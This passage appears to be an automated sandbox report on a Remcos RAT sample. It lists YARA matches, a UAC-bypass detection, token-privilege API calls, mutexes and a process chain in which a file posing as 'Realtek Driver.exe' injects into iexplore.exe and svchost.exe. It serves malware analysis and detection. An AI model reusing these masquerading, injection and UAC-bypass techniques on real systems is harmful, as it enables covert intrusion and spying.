                            Source: 00000007.00000000.2195185970.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                            Source: 00000000.00000000.2016191129.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                            Source: 00000005.00000002.2114459695.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                            Source: 00000008.00000002.2278067341.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                            Source: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                            Source: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                            Source: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                            Source: 00000002.00000000.2021874573.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                            Source: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                            Source: 00000003.00000002.3265970543.0000000004BA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                            Source: 00000003.00000002.3265970543.0000000004BA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                            Source: 00000003.00000002.3265970543.0000000004BA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                            Source: 00000007.00000002.2196423426.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                            Source: 00000005.00000000.2113169256.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                            Source: 00000004.00000002.3265805853.0000000003431000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                            Source: 00000000.00000003.2016636458.0000000000521000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                            Source: 00000004.00000002.3265606404.0000000003030000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                            Source: 00000004.00000002.3265606404.0000000003030000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                            Source: 00000004.00000002.3265606404.0000000003030000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                            Source: 00000002.00000002.2024405798.00000000005BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                            Source: 00000002.00000002.2024631723.0000000002570000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                            Source: 00000002.00000002.2024631723.0000000002570000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                            Source: 00000002.00000002.2024631723.0000000002570000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                            Source: 00000003.00000002.3265831941.00000000030BB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                            Source: Process Memory Space: 1.exe PID: 4956, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                            Source: Process Memory Space: Realtek Driver.exe PID: 6508, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                            Source: Process Memory Space: iexplore.exe PID: 3716, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                            Source: Process Memory Space: svchost.exe PID: 3448, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                            Source: Process Memory Space: Realtek Driver.exe PID: 1352, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                            Source: Process Memory Space: Realtek Driver.exe PID: 4996, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                            Source: Process Memory Space: Realtek Driver.exe PID: 6552, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exe, type: DROPPEDMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exe, type: DROPPEDMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                            Source: classification engineClassification label: mal100.rans.troj.spyw.expl.evad.winEXE@10/3@1/2
                            Source: C:\Users\user\Desktop\1.exeCode function: 0_2_0041798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,0_2_0041798D
                            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 3_2_02D8798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,3_2_02D8798D
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0304798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,4_2_0304798D
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCode function: 5_2_0041798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,5_2_0041798D
                            Source: C:\Users\user\Desktop\1.exeCode function: 0_2_0040F4AF GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,0_2_0040F4AF
                            Source: C:\Users\user\Desktop\1.exeCode function: 0_2_0041B539 FindResourceA,LoadResource,LockResource,SizeofResource,0_2_0041B539
                            Source: C:\Users\user\Desktop\1.exeCode function: 0_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,0_2_0041AADB
                            Source: C:\Users\user\Desktop\1.exeFile created: C:\Users\user\AppData\Roaming\Realtek AudioJump to behavior
                            Source: C:\Windows\SysWOW64\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\Realtek Audio-J15M0S-W
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeMutant created: \Sessions\1\BaseNamedObjects\Realtek Audio-J15M0S
                            Source: C:\Users\user\Desktop\1.exeCommand line argument: 0Q0_2_0040EA00
                            Source: C:\Users\user\Desktop\1.exeCommand line argument: 0Q0_2_0040EA00
                            Source: C:\Users\user\Desktop\1.exeCommand line argument: Software\0_2_0040EA00
                            Source: C:\Users\user\Desktop\1.exeCommand line argument: 0SG0_2_0040EA00
                            Source: C:\Users\user\Desktop\1.exeCommand line argument: Exe0_2_0040EA00
                            Source: C:\Users\user\Desktop\1.exeCommand line argument: Exe0_2_0040EA00
                            Source: C:\Users\user\Desktop\1.exeCommand line argument: 0SG0_2_0040EA00
                            Source: C:\Users\user\Desktop\1.exeCommand line argument: (TG0_2_0040EA00
                            Source: C:\Users\user\Desktop\1.exeCommand line argument: ,aF0_2_0040EA00
                            Source: C:\Users\user\Desktop\1.exeCommand line argument: Inj0_2_0040EA00
                            Source: C:\Users\user\Desktop\1.exeCommand line argument: Inj0_2_0040EA00
                            Source: C:\Users\user\Desktop\1.exeCommand line argument: 0Q0_2_0040EA00
                            Source: C:\Users\user\Desktop\1.exeCommand line argument: 0Q0_2_0040EA00
                            Source: C:\Users\user\Desktop\1.exeCommand line argument: 0Q0_2_0040EA00
                            Source: C:\Users\user\Desktop\1.exeCommand line argument: HVP0_2_0040EA00
                            Source: C:\Users\user\Desktop\1.exeCommand line argument: HVP0_2_0040EA00
                            Source: C:\Users\user\Desktop\1.exeCommand line argument: HVP0_2_0040EA00
                            Source: C:\Users\user\Desktop\1.exeCommand line argument: HSG0_2_0040EA00
                            Source: C:\Users\user\Desktop\1.exeCommand line argument: HVP0_2_0040EA00
                            Source: C:\Users\user\Desktop\1.exeCommand line argument: exepath0_2_0040EA00
                            Source: C:\Users\user\Desktop\1.exeCommand line argument: 0Q0_2_0040EA00
                            Source: C:\Users\user\Desktop\1.exeCommand line argument: ,aF0_2_0040EA00
                            Source: C:\Users\user\Desktop\1.exeCommand line argument: HSG0_2_0040EA00
                            Source: C:\Users\user\Desktop\1.exeCommand line argument: exepath0_2_0040EA00
                            Source: C:\Users\user\Desktop\1.exeCommand line argument: HVP0_2_0040EA00
                            Source: C:\Users\user\Desktop\1.exeCommand line argument: 0Q0_2_0040EA00
                            Source: C:\Users\user\Desktop\1.exeCommand line argument: licence0_2_0040EA00
                            Source: C:\Users\user\Desktop\1.exeCommand line argument: 0Q0_2_0040EA00
                            Source: C:\Users\user\Desktop\1.exeCommand line argument: 0Q0_2_0040EA00
                            Source: C:\Users\user\Desktop\1.exeCommand line argument: 0Q0_2_0040EA00
                            Source: C:\Users\user\Desktop\1.exeCommand line argument: 0Q0_2_0040EA00
                            Source: C:\Users\user\Desktop\1.exeCommand line argument: 0Q0_2_0040EA00
                            Source: C:\Users\user\Desktop\1.exeCommand line argument: 0Q0_2_0040EA00
                            Source: C:\Users\user\Desktop\1.exeCommand line argument: tMG0_2_0040EA00
                            Source: C:\Users\user\Desktop\1.exeCommand line argument: 0Q0_2_0040EA00
                            Source: C:\Users\user\Desktop\1.exeCommand line argument: 0Q0_2_0040EA00
                            Source: C:\Users\user\Desktop\1.exeCommand line argument: `SG0_2_0040EA00
                            Source: C:\Users\user\Desktop\1.exeCommand line argument: Administrator0_2_0040EA00
                            Source: C:\Users\user\Desktop\1.exeCommand line argument: User0_2_0040EA00
                            Source: C:\Users\user\Desktop\1.exeCommand line argument: del0_2_0040EA00
                            Source: C:\Users\user\Desktop\1.exeCommand line argument: del0_2_0040EA00
                            Source: C:\Users\user\Desktop\1.exeCommand line argument: del0_2_0040EA00
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCommand line argument: Software\5_2_0040EA00
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCommand line argument: 0SG5_2_0040EA00
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCommand line argument: Exe5_2_0040EA00
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCommand line argument: 0SG5_2_0040EA00
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCommand line argument: (TG5_2_0040EA00
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCommand line argument: ,aF5_2_0040EA00
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCommand line argument: Inj5_2_0040EA00
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCommand line argument: Inj5_2_0040EA00
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCommand line argument: RG5_2_0040EA00
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCommand line argument: RG5_2_0040EA00
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCommand line argument: RG5_2_0040EA00
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCommand line argument: HSG5_2_0040EA00
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCommand line argument: RG5_2_0040EA00
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCommand line argument: exepath5_2_0040EA00
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCommand line argument: ,aF5_2_0040EA00
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCommand line argument: HSG5_2_0040EA00
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCommand line argument: exepath5_2_0040EA00
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCommand line argument: RG5_2_0040EA00
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCommand line argument: licence5_2_0040EA00
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCommand line argument: tMG5_2_0040EA00
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCommand line argument: `SG5_2_0040EA00
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCommand line argument: Administrator5_2_0040EA00
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCommand line argument: User5_2_0040EA00
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCommand line argument: del5_2_0040EA00
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCommand line argument: del5_2_0040EA00
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeCommand line argument: del5_2_0040EA00
                            Source: 1.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: C:\Users\user\Desktop\1.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                            Source: C:\Users\user\Desktop\1.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                            Source: 1.exeVirustotal: Detection: 79%
                            Source: 1.exeReversingLabs: Detection: 86%
                            Source: C:\Users\user\Desktop\1.exeFile read: C:\Users\user\Desktop\1.exeJump to behavior
                            Source: unknownProcess created: C:\Users\user\Desktop\1.exe "C:\Users\user\Desktop\1.exe"
                            Source: C:\Users\user\Desktop\1.exeProcess created: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exe "C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exe"
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "c:\program files (x86)\internet explorer\iexplore.exe"
                            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                            Source: unknownProcess created: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exe "C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exe"
                            Source: unknownProcess created: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exe "C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exe"
                            Source: unknownProcess created: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exe "C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exe"
                            Source: C:\Users\user\Desktop\1.exeProcess created: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exe "C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "c:\program files (x86)\internet explorer\iexplore.exe"Jump to behavior
                            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exeJump to behavior
                            Source: C:\Users\user\Desktop\1.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\Desktop\1.exeSection loaded: winmm.dllJump to behavior
                            Source: C:\Users\user\Desktop\1.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Users\user\Desktop\1.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Users\user\Desktop\1.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\user\Desktop\1.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Users\user\Desktop\1.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\Desktop\1.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\1.exeSection loaded: rstrtmgr.dllJump to behavior
                            Source: C:\Users\user\Desktop\1.exeSection loaded: ncrypt.dllJump to behavior
                            Source: C:\Users\user\Desktop\1.exeSection loaded: ntasn1.dllJump to behavior
                            Source: C:\Users\user\Desktop\1.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Users\user\Desktop\1.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\Desktop\1.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\Desktop\1.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\Desktop\1.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\Desktop\1.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Users\user\Desktop\1.exeSection loaded: profapi.dllJump to behavior
